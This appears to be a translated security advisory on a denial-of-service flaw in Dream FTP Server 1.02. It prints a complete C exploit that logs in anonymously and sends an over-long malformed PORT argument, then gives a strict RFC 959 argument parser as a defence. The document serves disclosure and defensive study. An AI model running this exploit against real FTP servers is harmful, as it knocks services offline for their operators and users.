Dream FTP Server PORT Command Denial of Service Vulnerability

Published: 2006-12-21
Updated: 2006-12-25

Affected systems:
BolinTech Dream FTP 1.02
Description:
BUGTRAQ ID: 21700

Dream FTP Server is a multi-threaded FTP server.

Dream FTP Server contains a vulnerability in its handling of user requests; a remote attacker could exploit it to carry out a denial of service attack against the server.

A remote attacker can cause a denial of service by sending Dream FTP Server a PORT command with invalid arguments.

<*Source: InTeL
  
  Link: http://secunia.com/advisories/23471/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default,
which enables anyone to crash the server at will.
If anonymous logins have been disabled, try it with
another user/pass account.

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);


int usage(char *filename)
{
    printf("Dream FTP v1.02 DoS exploit\r\n");
    printf("By InTeL\r\n");
    printf("USAGE: %s <IP_Address> <port>\r\n", filename);

    exit(0);
}

int main(int argc, char *argv[])
{
    char evilbuf[40], recvbuf[1028];
    unsigned short port;
    struct sockaddr_in saddr;
    struct hostent *he;
    WSADATA wsaData;
    SOCKET sock;
    int i;    /* declared once so the counter is in scope for every loop below */

    if(argc != 3)
        usage(argv[0]);

    port = atoi(argv[2]);
    if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
        printf("Unable to initialize Winsock \n");
        exit(1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){
        printf("Socket Error \n");
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL){
        printf("Couldn't Resolve %s \n",argv[1]);
        exit(1);
    }

    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_addr = *((struct in_addr *)he->h_addr);
    saddr.sin_port = htons(port);

    if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR){
        printf("Connect Error \n");
        exit(1);
    }

    /* Drain the server banner (up to three reads) */
    for(i = 0; i < 3; i++){
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }
    printf("Logging in\r\n");

    /* Anonymous login: USER, then PASS */
    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "USER Anonymous\r\n"); //USER
    send(sock, evilbuf, strlen(evilbuf), 0);

    for(i = 0; i < 4; i++){
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }

    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
    send(sock, evilbuf, strlen(evilbuf), 0);

    for(i = 0; i < 3; i++){
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }
    printf("Building overflow string\r\n");

    /* "PORT " followed by 31 'A's instead of the h1,h2,h3,h4,p1,p2 argument;
       with CRLF and the terminating NUL this fits exactly in evilbuf[40] */
    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "PORT ");  //PORT
    for(i = 5; i != 36; i++)
        evilbuf[i] = 'A';
    strcat(evilbuf, "\r\n");

    send(sock, evilbuf, strlen(evilbuf), 0);

    printf("DoS Attack Done\r\n");
    closesocket(sock);
    WSACleanup();

    return 0;
}
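The trigger above replaces the PORT argument, which RFC 959 defines as six comma-separated decimal values h1,h2,h3,h4,p1,p2 in the range 0..255, with 31 letters. The following is an added example, not code from the advisory or from BolinTech: a strict PORT argument parser of the kind a server should run before touching the argument, which rejects the exploit's payload along with short, over-long, out-of-range and trailing-garbage variants. Function names are my own choice.

```c
#include <string.h>
#include <ctype.h>

/* Strict RFC 959 PORT argument check (added example, not vendor code).
 * Accepts only h1,h2,h3,h4,p1,p2 with six decimal fields in 0..255 and
 * rejects everything else: wrong field count, non-digits, out-of-range
 * values, over-long input, trailing bytes. Caller strips CRLF first. */
int parse_port_arg(const char *arg, unsigned char ip[4], unsigned short *port)
{
    unsigned int fields[6];
    size_t len = strlen(arg), pos = 0;
    int i;

    if (len == 0 || len > 23)       /* "255,255,255,255,255,255" is 23 chars */
        return -1;
    for (i = 0; i < 6; i++) {
        unsigned int v = 0;
        int ndigits = 0;
        while (pos < len && isdigit((unsigned char)arg[pos])) {
            v = v * 10 + (unsigned int)(arg[pos++] - '0');
            if (++ndigits > 3 || v > 255)
                return -1;          /* too many digits or value above 255 */
        }
        if (ndigits == 0)
            return -1;              /* empty field or a non-digit such as 'A' */
        fields[i] = v;
        if (i < 5 && (pos >= len || arg[pos++] != ','))
            return -1;              /* fewer than six fields / bad separator */
    }
    if (pos != len)
        return -1;                  /* trailing garbage after p2 */
    for (i = 0; i < 4; i++)
        ip[i] = (unsigned char)fields[i];
    *port = (unsigned short)(fields[4] * 256 + fields[5]);
    return 0;
}

/* Convenience wrapper: the parsed data port, or -1 when the argument is rejected. */
int port_arg_port(const char *arg)
{
    unsigned char ip[4];
    unsigned short port;
    return parse_port_arg(arg, ip, &port) == 0 ? (int)port : -1;
}
```

A server that also compares the parsed address with the control connection's peer closes the classic FTP bounce case at the same point, but that check is separate from the malformed-argument handling shown here.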

Recommendation:
Vendor patch:

BolinTech
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://www.bolintech.com/index.htm

This vulnerability was translated and compiled by 绿盟科技 (NSFOCUS). All rights reserved; reproduction without permission is prohibited.